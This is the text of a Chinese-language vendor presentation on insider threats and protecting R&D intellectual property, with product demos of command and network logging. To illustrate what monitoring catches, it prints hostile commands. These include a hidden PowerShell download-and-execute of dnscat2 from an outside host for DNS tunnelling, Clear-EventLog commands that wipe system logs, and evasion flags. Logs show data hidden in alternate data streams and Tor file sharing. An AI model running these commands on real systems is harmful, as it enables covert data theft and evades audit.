正面迎戰內部威脅,公司被害? 還是員工被駭?
FineArt - Victor Chen
資安風險維持Top 5,資料外洩 > 網路攻擊The Global Risks Report 2019 14th Edition
http://www3.weforum.org/docs/WEF_Global_Risks_Report_2019.pdf
風險可能性 衝擊
Top 5 Global Risks in Terms of Likelihood The Global Risks Landscape 2019
情資收集者最感興趣的六大領域
2018 Foreign Economic Espionage in Cyberspace reporthttps://www.dni.gov/files/NCSC/documents/news/20180724-economic-espionage-pub.pdf
Industry Priority Sectors/ Technologies
Energy/
Alternative
Energy
(能源/替代能源)
• Advanced pressurized
water reactor and high-
temperature, gas-
cooled nuclear power
stations
• Biofuels
• Energy-efficient
industries
• Oil, gas, and coalbed
methane development,
including fracking
• Smart grids
• Solar energy technology
• Wind turbines
Biotechnology
(生物技術)
• Advanced medical
devices
• Biomanufacturing and
chemical
manufacturing
• Biomaterials
• Biopharmaceuticals
• Genetically modified
organisms
• Infectious disease
treatment
• New vaccines and drugs
Defense
(國防科技)
• Aerospace &
aeronautic system
• Armaments
• Marin system
• Radar
• Optics
Environmental
Protection
(環境保護)
• Batteries
• Energy-efficient
appliances
• Green building
materials
• Hybrid and electric cars
• Waste management
• Water/air pollution control
Industry Priority Sectors/ Technologies
High-end
Manufacturing
(高端製造業)
• 3D Printing
• Advanced robotics
• Aircraft engines
• Aviation maintenance and
service sectors
• Civilian aircraft
• Electric motors
• Foundational manufacturing
equipment
• High-end computer
numerically controlled
machines
• High-performance
composite materials
• High-performance sealing
materials
• Integrated circuit
manufacturing equipment
and assembly technology
• Space infrastructure and
exploration technology
• Synthetic rubber
Information And
Communications
Technology
(信息通信技術)
• Artificial intelligence
• Big data analysis
• Core electronics industries
• E-commerce service
• Foundational software
products
• High-end computer chips
• Internet of thing
• Network equipment
• Next-generation broadband
wireless communications
networks
• Quantum computing and
communications
• Rare-earth materials
研發部門是企業命脈,卻最難管理
研發工程師工作環境
JTag
開發板
Servers (Data / DB)
IDE Application
Source code
RJ-45
HDL ToolsSimulatorIn-Circuit-TestCAX / EDA toolLayout Tools / PCB
DBSVNFileTest
Machine
R&D
SVS+SVT滿足研發開發工具之使用保護
System & DLL
Network API
CMD & Shell
Hardware
• System Call • Out Put File
• Download / Upload• Tunnel / Cloud Application• Custom Protocol
• CMD +• Power Shell Script• Run Executable(EXE)
• Connect to Hardware Device
• 3rd Party Application Screen / Video Capture
• Print Image• Pip Process (IPC)
IDEApplication
R&DKey Verification
Screen Capture
SVS + SVT 滿足對研發智慧財產完整保護
Prohibited/
Controlled
R&D專案開發電腦
可限制多種操作行為列印、PrtScr、IPC
CTRL-C + CTRL-V
Controlled
SVT Allowed
可正常使用SVN、開發板
可限制貼出字數
Demo 1 Visual Studio 寫出保護,系統防守
Visual Studio寫出儲存時,即受到保護
Visual Studio政策防守:Prohibited Call System
可以依據各產業別特殊工具進行防守與管控,確保智慧資產不會外洩。
指令環境下的風險,資安與稽核知多少?
IT資安與稽核應了解研發單位的應用
System & DLL
Network API
CMD & Shell
Hardware
• System Call • Out Put File
• Download / Upload• Tunnel / Cloud Application• Custom Protocol
• CMD +• Power Shell Script• Run Executable(EXE)
• Connect to Hardware Device
• 3rd Party Application Screen / Video Capture
• Print Image• Pip Process (IPC)
IDEApplication
R&DKey Verification
Screen Capture
OS defaultFunction & AP
IDE CallCommand
3rd PartyApplication
• Cmd.exe• Windows PowerShell• PowerShell ISE
• Call cmd.exe• Call PowerShell• Call exe
• ConEmu• PSReadLine• PSGet• Chocolatey• Babun (optional)• Cmder• Git Bash by MinGW & MinTTY• WSL ubuntu on windows• Cygwin• Xshell
• Console2• Powershell ise• Powershell• Dell powerGUI• Sapien Powershell studio• AWS tools for Powershell• Adam driscoll's powershell• Powershell web access,• Master-powershell• Vmware vsphere powerCLI
CMD 與PowerShell 環境分析
{ }
SDK Command
cmd軌跡記錄
SVS 安全碟
軟體安控
程序記錄
網路行為記錄
SVT 加密通道
從小處可以一窺指令軌跡記錄的重要性
Clear-EventLog -LogName System
Clear-EventLog -LogName Security
Clear-EventLog -LogName Application
DNS Tunnel with PowerShell
powershell.exe -nop -w hidden -c {IEX(New-Object System.Net.Webclient).DownloadString('https://pt.cyber-redteam.info/ dnscat2-
powershell/master/dnscat2.ps1’);
Start-Dnscat2 -Domain dnsch.cirrus.[domain] -PreSharedSecret dnschcirrus}
PowerShell Dodge 3 ways to download files with PowerShell Code Obfuscator
–WindowStyle hidden / -w
hidden
–Exec Bypass
–Command / -c
–EncodedCommand / -e / -Enc
–Nop / -Noprofile
Invoke-WebRequest
$url = "http://pt.cyber-redteam.info/risktest/Obfuscator.txt"
$output = "$PSScriptRoot\real.ps1"
$start_time = Get-Date
$readteam = New-Object System.Net.WebClient
$ readteam.DownloadFile($url, $output)
Crunchcode (VBA)
ScriptCryptor (VBA, JavaScript)
CodeProtection (VBA)
Vbad (VBA)
Stunnix (C++, Perl, JavaScript, VBScript )
Scripts Encryptor
(HTML,JavaScript/JScript, C/C++/MFC)
ISESteroids(PowerShell)System.Net.WebClient
−(New-object System.net.webclient).DownlodFile()
−(New-object System.net.Webclient).DownloadString()
Start-BitsTransfer
Start-BitsTransfer -Source $url -Destination $output -
Asynchronous Write-Output "Time taken: $((Get-
Date).Subtract($start_time).Seconds) second(s)"
Clean all event-log
dnscat2.ps1
Demo 2 各類指令行為軌跡記錄Invoke-Obfuscation
Teensy + Alternate Data Streams (ADS)
+
記錄時間 使用者帳號 應用程式名稱 命令內容 部門名稱 使用者全名 電腦名稱 IP PID 伺服器儲存時間
2019/03/12 DEMO01 powershell.exe Import-Module ./Invoke-Obfuscation.psd1IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5056 2019/03/12
2019/03/12 DEMO01 powershell.exe cd .\Invoke-Obfuscation-master\IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5056 2019/03/12
2019/03/12 DEMO01 powershell.exe cd .\Desktop\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5056 2019/03/12
2019/03/12 DEMO01 powershell.exe IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5056 2019/03/12
2019/03/12 DEMO01 powershell.exe IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5056 2019/03/12
2019/03/12 DEMO01 powershell.exe cd .\Desktop\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
2019/03/12 DEMO01 powershell.exe dir IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
2019/03/12 DEMO01 powershell.exe cd .\user\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
2019/03/12 DEMO01 powershell.exe dir IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
2019/03/12 DEMO01 powershell.exe cd .\Users\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
2019/03/12 DEMO01 powershell.exe dir IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
2019/03/12 DEMO01 powershell.exe cd\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
2019/03/12 DEMO01 powershell.exe copy c:\User\user\Desktop\XConsole.exe d:IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
2019/03/12 DEMO01 powershell.exe cd .\user\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
2019/03/12 DEMO01 powershell.exe cd .\Users\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
2019/03/12 DEMO01 powershell.exe cd\ IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
2019/03/12 DEMO01 powershell.exe IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
2019/03/12 DEMO01 powershell.exe IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 14196 2019/03/12
記錄時間 使用者帳號 應用程式名稱 命令內容 部門名稱 使用者全名 電腦名稱 IP PID 伺服器儲存時間
2019/03/12 DEMO01 CMD.exe wordpad fake.docx:AI.DOCX IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12
2019/03/12 DEMO01 CMD.exe wordpad fake.docx IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12
2019/03/12 DEMO01 CMD.exe wordpade fake.docx IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12
2019/03/12 DEMO01 CMD.exe wordpade f wordpade fake.docxIT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12
2019/03/12 DEMO01 CMD.exe dir IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12
2019/03/12 DEMO01 CMD.exe DEL AI.DOCX IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12
2019/03/12 DEMO01 CMD.exe WMIC DATAFILE WHERE DRIVE='C:' AND eXTENSION='DOCX' LISTIT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12
2019/03/12 DEMO01 CMD.exe E: IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12
2019/03/12 DEMO01 CMD.exe TYPE AI.DOCX>>FAKE.DOCX:AI.DOCXIT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12
2019/03/12 DEMO01 CMD.exe COPY D:AI.DOCX E: IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12
2019/03/12 DEMO01 CMD.exe COPY D:FAKE.DOCX E: IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12
2019/03/12 DEMO01 CMD.exe FORMAT E: /FS:NTFS /Q /V:ads IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 5096 2019/03/12
2019/03/12 DEMO01 cmd.exe ipconfig IT demo01 DESKTOP-0QTVR1U#1 192.168.218.1 8708 2019/03/12
內部網路活動,資安有風險?
分析企業網路架構
1. 阻斷外部網路服務
2. 部分開放外部網路服務 (實體隔離)
3. 開放外部網路服務
外部網路服務
內部網路服務
企業組織網路型態
外部DNS
官網
外部郵件
內部DNS
主管資訊系統
內部郵件
其他
安全防護與網路架構
各類型防火牆
VPN
雲端架構
資料倉儲
端點裝置
分點網路架構
外部裝置
無人看管
出差裝置
行動裝置 VoIP
WiFi
SVNCRM
ERP
端點網路活動,找出風險
Role IP/Domain Channel Port Protocol Action Software Interested Time
1. 員工
2. 駭客
3. OS
4. 程序
InternetIntranet
LocalhostX
白名單黑名單風險目標觀察名單
X來源/目的
NormalProxyTunnelSVT
白名單黑名單警示通訊埠
TCPUDPDNS
其他自訂協定
拷貝/刪除更名/複製搬移檔案
上傳檔案貼出文字拖拉檔案
IM
FTP
P2P
TorNet
檔案大小檔案數量頻率規則檔案變動檔案名稱檔案Hash
上班時間下班時間半夜
人 地 事 物 時
內部網路服務
內部DNS
主管資訊系統
內部郵件
資料倉儲
端點裝置
SVNCRM
ERP
Takeafile & Onion Share 2.0 防守與網路記錄阻擋所有拖曳檔案到瀏覽器禁止應用程式執行&阻擋拖曳檔案到瀏覽器
記錄網路連結行為,目的地洋蔥網路 記錄網路連結行為(UDP)
https://takeafile.com/
瀏覽日期 使用者帳號 IP 網址 瀏覽器名稱
2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxccmctfjhyovl25p4ftdyncj5samatcqd.onion/peso-linguinionionshare-gui.exe
2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxccmctfjhyovl25p4ftdyncj5samatcqd.onion/static/img/favicon.icoonionshare-gui.exe
2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxccmctfjhyovl25p4ftdyncj5samatcqd.onion/static/css/style.cssonionshare-gui.exe
2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxccmctfjhyovl25p4ftdyncj5samatcqd.onion/peso-linguini/downloadonionshare-gui.exe
2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxccmctfjhyovl25p4ftdyncj5samatcqd.onion/static/img/web_file.pngonionshare-gui.exe
2019/03/12 15:54 DEMO01 192.168.218.1 http://zcekmfrons74xzuufrlhstqxccmctfjhyovl25p4ftdyncj5samatcqd.onion/static/img/logo.pngonionshare-gui.exe
Time Source Destination Protocol Length Info
5.154527 192.168.1.188 192.168.1.170 DTLSv1.2 1279 Application Data
5.154641 192.168.1.188 192.168.1.170 DTLSv1.2 1279 Application Data
5.154648 192.168.1.170 192.168.1.188 DTLSv1.2 107 Application Data
5.154648 192.168.1.170 192.168.1.188 DTLSv1.2 107 Application Data
5.154649 192.168.1.170 192.168.1.188 DTLSv1.2 107 Application Data
5.154703 192.168.1.188 192.168.1.170 DTLSv1.2 1279 Application Data
企業防洩密。資安找精品
www.fineart-tech.com